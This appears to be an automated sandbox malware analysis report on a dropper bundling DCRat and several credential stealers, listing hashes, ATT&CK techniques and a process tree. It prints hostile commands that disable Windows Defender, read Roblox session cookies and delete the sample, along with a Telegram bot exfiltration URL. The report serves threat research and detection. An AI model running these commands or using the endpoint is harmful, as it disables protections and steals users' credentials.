dcrat | f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70

Analysis

max time kernel
11s
max time network
12s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
13-01-2025 18:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nonagon.exe
Size

23KB
MD5

1b554731ea6b94e44ab6fe7ec45eb153
SHA1

1849707450548f79b4f8d941745c2c72199a7f00
SHA256

f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70
SHA512

96880df0242f41380e2877a3cac119e14ab062c4892040a3d8c9fe5fbc58ee6681729d1a1ca5c62427d4ad5ca76be1167d8811e9b4c35656e0c1000d660c06c1
SSDEEP

384:LD5Ry1Yg5MsZHalPXhZAiWGVDNr2mtbQ2E65wMxsWSjRSiKM3EMtR:zymgSCh2Ey/GWSjRSiKM3Nt

Score

10^/10

dcrat gurcu phemedrone umbral credential_access discovery execution infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocument

Extracted

Family

gurcu

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocumen

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0028000000046126-41.dat	family_umbral
behavioral1/memory/3616-70-0x000001E314660000-0x000001E3146A0000-memory.dmp	family_umbral

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0028000000046121-16.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3316	powershell.exe
2100	powershell.exe
3712	powershell.exe
4060	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wtf1.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1898866115-3160784972-1217720036-1000\Control Panel\International\Geo\Nation	RarExtPackage.exe

Executes dropped EXE 4 IoCs

pid	Process
4364	RarExtPackage.exe
3616	wtf1.exe
924	wtf.exe
4468	cs2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
35	discord.com
36	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Nvidia = "C:\\Program Files\\WinRAR\\RarExtPackage.exe"	Nonagon.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WinRAR\RarExtPackage.exe	Nonagon.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\debug\wtf.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File created	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File opened for modification	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File created	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File created	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe
File created	C:\Windows\debug\__tmp_rar_sfx_access_check_240620078	RarExtPackage.exe
File created	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File created	C:\Windows\debug\wtf.exe	RarExtPackage.exe
File created	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf1.exe	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RarExtPackage.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4252	cmd.exe
3548	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2028	wmic.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1898866115-3160784972-1217720036-1000_Classes\Local Settings	RarExtPackage.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3548	PING.EXE

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
924	wtf.exe
4468	cs2.exe
3096	wmic.exe
3096	wmic.exe
3096	wmic.exe
3096	wmic.exe
3616	wtf1.exe
3316	powershell.exe
3316	powershell.exe
2100	powershell.exe
2100	powershell.exe
3712	powershell.exe
3712	powershell.exe
3112	powershell.exe
3112	powershell.exe
3552	wmic.exe
3552	wmic.exe
3552	wmic.exe
3552	wmic.exe
228	wmic.exe
228	wmic.exe
228	wmic.exe
228	wmic.exe
2408	wmic.exe
2408	wmic.exe
2408	wmic.exe
2408	wmic.exe
4060	powershell.exe
4060	powershell.exe
2028	wmic.exe
2028	wmic.exe
2028	wmic.exe
2028	wmic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	924	wtf.exe
Token: SeDebugPrivilege	3616	wtf1.exe
Token: SeDebugPrivilege	4468	cs2.exe
Token: SeIncreaseQuotaPrivilege	3096	wmic.exe
Token: SeSecurityPrivilege	3096	wmic.exe
Token: SeTakeOwnershipPrivilege	3096	wmic.exe
Token: SeLoadDriverPrivilege	3096	wmic.exe
Token: SeSystemProfilePrivilege	3096	wmic.exe
Token: SeSystemtimePrivilege	3096	wmic.exe
Token: SeProfSingleProcessPrivilege	3096	wmic.exe
Token: SeIncBasePriorityPrivilege	3096	wmic.exe
Token: SeCreatePagefilePrivilege	3096	wmic.exe
Token: SeBackupPrivilege	3096	wmic.exe
Token: SeRestorePrivilege	3096	wmic.exe
Token: SeShutdownPrivilege	3096	wmic.exe
Token: SeDebugPrivilege	3096	wmic.exe
Token: SeSystemEnvironmentPrivilege	3096	wmic.exe
Token: SeRemoteShutdownPrivilege	3096	wmic.exe
Token: SeUndockPrivilege	3096	wmic.exe
Token: SeManageVolumePrivilege	3096	wmic.exe
Token: 33	3096	wmic.exe
Token: 34	3096	wmic.exe
Token: 35	3096	wmic.exe
Token: 36	3096	wmic.exe
Token: SeIncreaseQuotaPrivilege	3096	wmic.exe
Token: SeSecurityPrivilege	3096	wmic.exe
Token: SeTakeOwnershipPrivilege	3096	wmic.exe
Token: SeLoadDriverPrivilege	3096	wmic.exe
Token: SeSystemProfilePrivilege	3096	wmic.exe
Token: SeSystemtimePrivilege	3096	wmic.exe
Token: SeProfSingleProcessPrivilege	3096	wmic.exe
Token: SeIncBasePriorityPrivilege	3096	wmic.exe
Token: SeCreatePagefilePrivilege	3096	wmic.exe
Token: SeBackupPrivilege	3096	wmic.exe
Token: SeRestorePrivilege	3096	wmic.exe
Token: SeShutdownPrivilege	3096	wmic.exe
Token: SeDebugPrivilege	3096	wmic.exe
Token: SeSystemEnvironmentPrivilege	3096	wmic.exe
Token: SeRemoteShutdownPrivilege	3096	wmic.exe
Token: SeUndockPrivilege	3096	wmic.exe
Token: SeManageVolumePrivilege	3096	wmic.exe
Token: 33	3096	wmic.exe
Token: 34	3096	wmic.exe
Token: 35	3096	wmic.exe
Token: 36	3096	wmic.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeIncreaseQuotaPrivilege	3316	powershell.exe
Token: SeSecurityPrivilege	3316	powershell.exe
Token: SeTakeOwnershipPrivilege	3316	powershell.exe
Token: SeLoadDriverPrivilege	3316	powershell.exe
Token: SeSystemProfilePrivilege	3316	powershell.exe
Token: SeSystemtimePrivilege	3316	powershell.exe
Token: SeProfSingleProcessPrivilege	3316	powershell.exe
Token: SeIncBasePriorityPrivilege	3316	powershell.exe
Token: SeCreatePagefilePrivilege	3316	powershell.exe
Token: SeBackupPrivilege	3316	powershell.exe
Token: SeRestorePrivilege	3316	powershell.exe
Token: SeShutdownPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeSystemEnvironmentPrivilege	3316	powershell.exe
Token: SeRemoteShutdownPrivilege	3316	powershell.exe
Token: SeUndockPrivilege	3316	powershell.exe
Token: SeManageVolumePrivilege	3316	powershell.exe
Token: 33	3316	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 4364	1956	Nonagon.exe	80
PID 1956 wrote to memory of 4364	1956	Nonagon.exe	80
PID 1956 wrote to memory of 4364	1956	Nonagon.exe	80
PID 4364 wrote to memory of 348	4364	RarExtPackage.exe	81
PID 4364 wrote to memory of 348	4364	RarExtPackage.exe	81
PID 4364 wrote to memory of 348	4364	RarExtPackage.exe	81
PID 4364 wrote to memory of 3616	4364	RarExtPackage.exe	82
PID 4364 wrote to memory of 3616	4364	RarExtPackage.exe	82
PID 4364 wrote to memory of 924	4364	RarExtPackage.exe	84
PID 4364 wrote to memory of 924	4364	RarExtPackage.exe	84
PID 4364 wrote to memory of 4468	4364	RarExtPackage.exe	85
PID 4364 wrote to memory of 4468	4364	RarExtPackage.exe	85
PID 3616 wrote to memory of 3096	3616	wtf1.exe	88
PID 3616 wrote to memory of 3096	3616	wtf1.exe	88
PID 3616 wrote to memory of 2656	3616	wtf1.exe	92
PID 3616 wrote to memory of 2656	3616	wtf1.exe	92
PID 3616 wrote to memory of 3316	3616	wtf1.exe	94
PID 3616 wrote to memory of 3316	3616	wtf1.exe	94
PID 3616 wrote to memory of 2100	3616	wtf1.exe	97
PID 3616 wrote to memory of 2100	3616	wtf1.exe	97
PID 3616 wrote to memory of 3712	3616	wtf1.exe	99
PID 3616 wrote to memory of 3712	3616	wtf1.exe	99
PID 3616 wrote to memory of 3112	3616	wtf1.exe	101
PID 3616 wrote to memory of 3112	3616	wtf1.exe	101
PID 3616 wrote to memory of 3552	3616	wtf1.exe	103
PID 3616 wrote to memory of 3552	3616	wtf1.exe	103
PID 3616 wrote to memory of 228	3616	wtf1.exe	107
PID 3616 wrote to memory of 228	3616	wtf1.exe	107
PID 3616 wrote to memory of 2408	3616	wtf1.exe	109
PID 3616 wrote to memory of 2408	3616	wtf1.exe	109
PID 3616 wrote to memory of 4060	3616	wtf1.exe	111
PID 3616 wrote to memory of 4060	3616	wtf1.exe	111
PID 3616 wrote to memory of 2028	3616	wtf1.exe	113
PID 3616 wrote to memory of 2028	3616	wtf1.exe	113
PID 3616 wrote to memory of 4252	3616	wtf1.exe	115
PID 3616 wrote to memory of 4252	3616	wtf1.exe	115
PID 4252 wrote to memory of 3548	4252	cmd.exe	117
PID 4252 wrote to memory of 3548	4252	cmd.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2656	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nonagon.exe
"C:\Users\Admin\AppData\Local\Temp\Nonagon.exe"
1⤵
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Program Files\WinRAR\RarExtPackage.exe
  "C:\Program Files\WinRAR\RarExtPackage.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\debug\VUQLBafFd1oU7p3k.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:348
- - C:\Windows\debug\wtf1.exe
    "C:\Windows\debug\wtf1.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3096
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Windows\debug\wtf1.exe"
      4⤵
      Drops file in Windows directory
      Views/modifies file attributes
      PID:2656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\debug\wtf1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3112
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3552
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:228
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4060
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2028
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\debug\wtf1.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:4252
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3548
- - C:\Windows\debug\wtf.exe
    "C:\Windows\debug\wtf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:924
- - C:\Windows\debug\cs2.exe
    "C:\Windows\debug\cs2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WinRAR\RarExtPackage.exe

Filesize
1.5MB

MD5
84d934c68349e798f58a35df1f2f90c2

SHA1
be0974e4699ff06f52f0d5d380bc9cb8f0c50e19

SHA256
3b7218b64c14fc5125a93b4f898886d3bb9c1bb69f0696ae557bb2b79fe8e8f6

SHA512
83ea4479e8536b015a628c0a8ca0662b269875f303bd0193ad551022c04105406001990f3b261c8201ec031d92047450debe1c915a2e361eddb80b48b876d335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a9ab4419e3986b8e240c9478cc52eb51

SHA1
7e1b1b31bc47b9d4dccea76e6511d3632cb0395e

SHA256
87c993fd034df762cdf24506c046959e98985d38697b234f7ca092db49671846

SHA512
8f3d3ac39795b11719f40d3eb9a574576c8a5e6b837a1f3d63f7996faaf728e02ec5e26f4bed71ab850c9fa9272ec94fb6449b251eadc82672f84bdd5ec256a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3cd1b473bd9fb31842aea30f9d605524

SHA1
b4a28365cb5a1d6799c93b16f179ba7b2e614104

SHA256
a5db10355284cf19f3bbb2270159d4cb5771c00cf3ec885912181ffd637ac1c9

SHA512
b0fe7e3da43ab3159030e9764b9f6d81c6aa69b0cbf461902c0e4ab14e51a7b9095a787202a03cc1adcb22f562c23fcd728bd46e348342d2bb692851350a71f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmbsxeim.smw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\debug\VUQLBafFd1oU7p3k.vbe

Filesize
217B

MD5
f9ed37928a0d95692faa9f69d0cd5cb7

SHA1
77c2968f3d2ba8afb128307105861734b4fce286

SHA256
61ac997d454ae62b6025b60e2ac9f1c7031cf380f3d9d1395de3cd816d35554a

SHA512
cbe7954def42abac38dde5ba9f9fbc341e8e9161a9b0826e9fe779541fdf2b0057402d9c3dab608a9b01dc9c3229a122e13ac71bd52be978adbd628d16867b79

Download Submit
C:\Windows\debug\cs2.exe

Filesize
137KB

MD5
509f2eeba11a964fa8d22ab6994cee78

SHA1
544321089bbc1cbc6e51eabcfcb0c042f797142c

SHA256
21c7ecd4074b68a2d59b6b241037392a0f1ee2d6450fa3c72a3895f3563d5a2a

SHA512
f6eed65466977ef5b775e9dd1c204790b901e64bebc648e71b38062dd5d9207cc53fbfa4bf7b170dfc1fa41bfb1570cb6527863d9abe5d03efc49eedc5487cf0

Download Submit
C:\Windows\debug\wtf.exe

Filesize
265KB

MD5
47ba0b9187c62981c229372477e2b2a0

SHA1
9c861ee21eb30ec6aa35b02bd437f70c2ac25eee

SHA256
93a0a5f1d487c699ba0809428c732bb0d741bc41b4459490b24d9b03ee3183fc

SHA512
2a65a3b52751ce99918ab3e01db1cc21e08e5a5069fd0256a6601a3aee5d2d75ce842c9eeb147cd7d76612b0ab8f86adee2eab3fea8e410f55c8061a690585c7

Download Submit
C:\Windows\debug\wtf1.exe

Filesize
229KB

MD5
187795687849f43176bc94aff323435f

SHA1
22e3d510df771291a2a256946ac6268ccf5d10be

SHA256
d7ebf40f863050be539cd8cbba2463c48235aa509819ed3b066a1c0b4974203e

SHA512
b099c9cbd3f5d9cd44dae19c66e88d32e5c290fa3f8cd6818397b54f2f73d318738d96b295053254bed4f254a2ebdfb2a8e75402e61314343060447888d781a3

Download Submit
memory/924-76-0x00000285650F0000-0x0000028565136000-memory.dmp

Filesize
280KB

Download
memory/3316-87-0x000001DED45A0000-0x000001DED45C2000-memory.dmp

Filesize
136KB

Download
memory/3616-105-0x000001E32EBE0000-0x000001E32EC30000-memory.dmp

Filesize
320KB

Download
memory/3616-106-0x000001E32EBC0000-0x000001E32EBDE000-memory.dmp

Filesize
120KB

Download
memory/3616-104-0x000001E32EE80000-0x000001E32EEF6000-memory.dmp

Filesize
472KB

Download
memory/3616-130-0x000001E32EF10000-0x000001E32EF1A000-memory.dmp

Filesize
40KB

Download
memory/3616-131-0x000001E32F050000-0x000001E32F062000-memory.dmp

Filesize
72KB

Download
memory/3616-70-0x000001E314660000-0x000001E3146A0000-memory.dmp

Filesize
256KB

Download
memory/3616-149-0x000001E32EA90000-0x000001E32EB8F000-memory.dmp

Filesize
1020KB

Download
memory/4468-80-0x0000028CEABC0000-0x0000028CEABE8000-memory.dmp

Filesize
160KB

Download